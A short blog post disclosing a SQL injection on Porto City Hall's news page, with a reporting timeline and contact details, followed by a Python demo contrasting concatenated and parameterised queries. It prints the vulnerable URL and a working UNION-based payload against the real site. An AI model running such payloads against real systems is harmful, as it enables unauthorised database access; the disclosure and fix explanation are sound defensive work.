It was very cool to find a SQL injection on Porto's City Hall.

Easy to report and things worked well overall.


20/03/17 – Warning phone call to 222097050; spoke with Mr. José Lobão

20/03/17 – Report sent to joselobao@cm-porto.pt

21/04/17 – Thank you letter received.


Here is a copy of the report I did: pdf report


SQLi in: http://www.cm-porto.pt/cultura/noticias?id=22827


Injection example:

http://www.cm-porto.pt/cultura/noticias?id=-1674 UNION ALL SELECT CONCAT(0x7171706271,IFNULL(CAST(version() AS CHAR),0x20),0x7176787071)-- ZKXp
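The payload above works because the `id` parameter is pasted straight into the SQL statement, so a negative id that matches nothing followed by `UNION ALL SELECT` lets the attacker's column ride along in the result. The following is an added example that is not from the original post and says nothing about the site's real backend: it uses an in-memory SQLite table with constructed rows (`noticias`, `titulo` and the payload markers are assumptions), shows the concatenation bug next to the hardened version, and runs the same page-style input through both. The hardened version rejects anything that is not an integer and binds the value as a parameter, so the `UNION` is never interpreted as SQL.

```python
import sqlite3

# Constructed sample data; the real site's schema is not known.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE noticias (id INTEGER PRIMARY KEY, titulo TEXT)")
    conn.executemany(
        "INSERT INTO noticias VALUES (?, ?)",
        [(22827, "Sample news item (constructed)"), (1, "Another item (constructed)")],
    )
    return conn


def get_news_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    # Bug: the request parameter is concatenated into the statement text,
    # so anything after the number is executed as SQL.
    sql = "SELECT titulo FROM noticias WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def get_news_safe(conn: sqlite3.Connection, id_param: str):
    # Fix 1: validate the type up front; an article id must be an integer.
    try:
        news_id = int(id_param)
    except ValueError:
        return None  # reject the request (e.g. HTTP 400) instead of querying
    # Fix 2: bind the value as a parameter; the driver never treats it as SQL.
    return conn.execute(
        "SELECT titulo FROM noticias WHERE id=?", (news_id,)
    ).fetchall()


# Constructed payload in the same shape as the one in the report, adapted to
# SQLite syntax (|| instead of CONCAT, sqlite_version() instead of version()).
# The marker strings are assumptions used only to spot the injected column.
DEMO_PAYLOAD = "-1674 UNION ALL SELECT 'qqpbq' || sqlite_version() || 'qvxpq'"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_normal": get_news_vulnerable(conn, "22827"),
        "vulnerable_payload": get_news_vulnerable(conn, DEMO_PAYLOAD),
        "safe_normal": get_news_safe(conn, "22827"),
        "safe_payload": get_news_safe(conn, DEMO_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the vulnerable function the payload returns a row whose text is the database version wrapped in the markers, which is exactly the kind of output a scanner looks for to confirm the injection; with the hardened function the same input is rejected before any query runs, and even if the integer check were skipped, the bound parameter would simply match no row.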